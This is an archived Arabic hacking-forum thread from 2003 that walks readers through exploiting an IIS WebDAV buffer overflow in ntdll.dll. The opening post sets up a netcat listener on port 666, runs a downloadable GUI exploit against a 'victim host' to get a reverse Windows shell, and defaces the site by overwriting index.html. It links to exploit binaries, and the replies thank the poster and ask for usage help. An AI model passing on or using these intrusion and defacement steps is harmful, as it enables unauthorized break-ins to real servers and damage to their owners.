المساعد الشخصي الرقمي

مشاهدة النسخة كاملة : ثغرة لسيرفرات الـ IIS تسمح بحدوث بفر اوفر فلو في ملف ntdll.dll


Smart c0d3r
31-08-2003, 05:04
السلام عليكم

"أرجوا عدم استخدام الثغرة فيما حرمه الله وانا ابرئ ذمتي من كل استخدام محرم"

شباب الثغرة هذه سهلة وان شا الله تستخدموها في خير:)

الثغره باختصار تسمح بحدوث بفر اوفر فلو في الملف ntdll.dll في سريفرات ال iis ..
طريقه الاستخدام ..
اولا باستخدام الاداه نت كات ..افتح بورتا في جهازك كالتالي..
ادخل الى الفولدر الموجود فيه النت كات و اكتب التالي :
nc -L -vv -p 666
or
nc.exe -L -vv -p 666
بعد ذلك باستخدام الاكسبلويت دات البيئه الرسوميه .. و المسماه xwbf v-0.3.exe
اكتب في خانه ال satan ip رقم الايبي الخاص بك .
و في خانه ال victim host عنوان الموقع المستهدف
satan port البورت اللي فتحته في جهازك بالنت كات و هو 666
ثم اضغط exploit ..
طبعا ميزه هذه الاداه الرسوميه انها تستخدم costum pads >> و اذا لم تصلح هذه الret addrs فانها تلجا الى ال brute force و تجرب 250 return addrs ..
طبعا فيه سكانر دوروا عليه اسمه webdav scan بس ده بيبحث عن المواقع اللي فيها الويب ديف .... و ليس المواقع المصابه ..يعني ممكن تكون مصابه و ممكن تكون لا
لو الاكسبلويت نجحت المفروض انك تلاقي في شاشه الدوس بتاعه النت كات شل للويندوز عاده بيكون
c:\windows\system32>
كده مبروك انت اخترقت الموقع ! اكتب باه الاوامر بتاعتك مثلا :
echo i hacked this site >c:\inetpub\wwwroot\index.html

...بالنسبه للنت كات ممكن تحملها من اي موقع لو انت بحثت عنها ..اما الاكسبلويت فهي ممكن تحملها من هنا :
http://members.lycos.co.uk/linuxdude/xwbf-v0.3.exe
او ممكن تبحث عنها !

يمكنكم التعرف اكثر على ثغرة بفر اوفر فلو من جزئين:-
http://www.3asfh.com/vb/showthread.php?s=&threadid=3390
http://www.3asfh.com/vb/showthread.php?s=&threadid=3667
تحياتي منقوووول|4|

الهجوم
31-08-2003, 05:24
مشكور اخى المتمكن

على هذا الثغرة الجميل و جرى التجربة على الثغرة الان


الهجوم

اه بس الربط الخاص الاكسبلويت ماش شغيل


الهجوم

Smart c0d3r
01-09-2003, 03:50
الرابط شغال بس لانو فيه صفحة رئيسية

ما يشتغل

بحاول اشوف وصلة اخرى

باي|4|

maxhak2000
01-09-2003, 05:56
موضوع مميز مو غريبه من عضو مميز

تشاااااااو

ReD_BoY
01-09-2003, 06:39
أشكرك على الموضوع

بس فى شغلة وهى النت كات يفتح البورت 666 فقط وبعدها يختفى وأنت تقول فى الشرح راح تجيك شاشة النت كات وفيها
c:\windows\system32>

سؤالى

هل راح يشتغل بعد ماأنجح فى أختراق الموقع أو بعد ماأصيد موقع فية الثغرة

MIDO82
01-09-2003, 11:00
هل هو شغال على اللينكس فقط؟

Smart c0d3r
02-09-2003, 05:21
السلام

اهلين اخي ماكس مشكور على الإطراء والله يوفقك;)

اخي ReD_BoY انا ما فهمت زين على سؤالك بس البورت بيكون مفتوح خاصة لما تخش موقع فية الثغرة واذا كلامي غلط عدلوه :D

اخي MIDO82 هذه اوامر اللينكس يمكنك استخدام برنامج cgywin من بدل ذلك

ركبه في الويندوز ويشتغل عندك اوامر اللينكس

تحياتي|4|

MIDO82
02-09-2003, 11:19
مشكور ويعطيك العافية

Smart c0d3r
03-09-2003, 12:20
الله يعافيك حبيبي

نورت تحياتي|4|

«½«
05-09-2003, 02:57
أخى ممكن ترفقلنا الأكسبلويت لأنى بحثت عنها مش لاقيها و لك تحياتى

xwbf v-0.3.exe

Smart c0d3r
11-09-2003, 08:56
حبيبي تفضل

http://members.home.nl/deruiter/xwbf-v0.3.exe

تحياتي

q8hacker
13-09-2003, 03:47
تسلللللللم على الثغرة :D

عندي سؤال اتقول افتح بورت 666 بجهازك بالنت كات الي ابي اعرفه انت تقصد البورت يعني مثل بورت التلنت والاف تي بي وكذا ولا لها معنى ثاني ؟؟؟؟؟؟

طيب لو فتحت البورت كيف ارد اسكره بعد ماخلص ؟؟؟؟:confused: